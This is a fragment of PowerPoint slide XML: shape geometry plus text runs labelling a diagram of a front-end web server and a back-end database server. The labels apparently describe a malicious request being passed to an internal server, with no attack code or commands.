              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Back-end </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20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600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-65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600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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053585" y="7259828"/>
            <a:ext cx="1416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20" b="1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458080" y="7079995"/>
            <a:ext cx="3430904" cy="1218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066165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Mal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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45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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-9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dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rmat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rna</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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6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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2344420">
              <a:lnSpc>
                <a:spcPts val="1720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Front-end</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2268220">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90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600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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757159" y="6316979"/>
            <a:ext cx="422275" cy="443865"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="422275" h="443865">
                <a:moveTo>
                  <a:pt x="351790" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42969" y="5528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20605" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="42969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="373126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="400514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20605" y="422878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42969" y="437955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70358" y="443484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351790" y="443484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379178" y="437955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401542" y="422878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416619" y="400514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422148" y="373126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422148" y="70358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416619" y="42969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401542" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379178" y="5528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351790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7898130" y="6393891"/>
            <a:ext cx="1416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20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305038" y="6294501"/>
            <a:ext cx="240157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13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dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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6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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5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dirty="0" sz="160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dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>erfo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ms  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ma</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>iciou</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-12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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-35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4648200" y="4140961"/>
            <a:ext cx="7277100" cy="2037080"/>
            <a:chOff x="4648200" y="4140961"/>
            <a:chExt cx="7277100" cy="2037080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9146285" y="5496305"/>
              <a:ext cx="548640" cy="669290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="548640" h="669289">
                  <a:moveTo>
                    <a:pt x="457200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="9144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9146285" y="5496305"/>
              <a:ext cx="548640" cy="669290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="548640" h="669289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="91440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="66903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9193529" y="5670041"/>
              <a:ext cx="434975" cy="370840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="349885" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="92963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="92963"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="184404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="184404"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="277368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="277368"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="370332"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="370332"/>
                  </a:lnTo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59671" y="5464936"/>
              <a:ext cx="168148" cy="16687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2267" y="5702808"/>
              <a:ext cx="286511" cy="286511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10887455" y="5660136"/>
              <a:ext cx="323215" cy="321945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="323215" h="321945">
                  <a:moveTo>
                    <a:pt x="161544" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="118577" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79981" y="21956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47291" y="47101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22041" y="79643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5766" y="118048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="160781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5766" y="203515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22041" y="241920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47291" y="274462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79981" y="299607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118577" y="315819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161544" y="321563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204510" y="315819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243106" y="299607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275796" y="274462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301046" y="241920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317321" y="203515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323088" y="160781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317321" y="118048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301046" y="79643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275796" y="47101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243106" y="21956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204510" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161544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0979658" y="5817869"/>
              <a:ext cx="34925" cy="49530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="34925" h="49529">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34417" y="49275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0998327" y="5775070"/>
              <a:ext cx="122555" cy="92075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122554" h="92075">
                  <a:moveTo>
                    <a:pt x="0" y="92075"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122427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9954767" y="4963667"/>
              <a:ext cx="321945" cy="321945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="321945" h="321945">
                  <a:moveTo>
                    <a:pt x="160781" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="109971" y="8199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65836" y="31028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31028" y="65836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8199" y="109971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="160782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8199" y="211592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31028" y="255727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65836" y="290535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109971" y="313364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160781" y="321564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211592" y="313364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255727" y="290535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290535" y="255727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313364" y="211592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321563" y="160782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313364" y="109971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290535" y="65836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255727" y="31028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211592" y="8199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160781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0059161" y="5066537"/>
              <a:ext cx="118110" cy="119380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="118109" h="119379">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117729" y="117728"/>
                  </a:lnTo>
                </a:path>
                <a:path w="118109" h="119379">
                  <a:moveTo>
                    <a:pt x="0" y="119252"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117729" y="1524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4792218" y="5212841"/>
              <a:ext cx="548640" cy="669290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="548639" h="669289">
                  <a:moveTo>
                    <a:pt x="457200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="9144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4792218" y="5212841"/>
              <a:ext cx="548640" cy="669290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="548639" h="669289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="91440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548640" y="669036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="669036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4840986" y="5386577"/>
              <a:ext cx="434975" cy="370840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="349885" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="92963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="92963"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="185927"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="185927"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="277368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="277368"/>
                  </a:lnTo>
                </a:path>
                <a:path w="434975" h="370839">
                  <a:moveTo>
                    <a:pt x="0" y="370332"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="434975" y="370332"/>
                  </a:lnTo>
                </a:path>
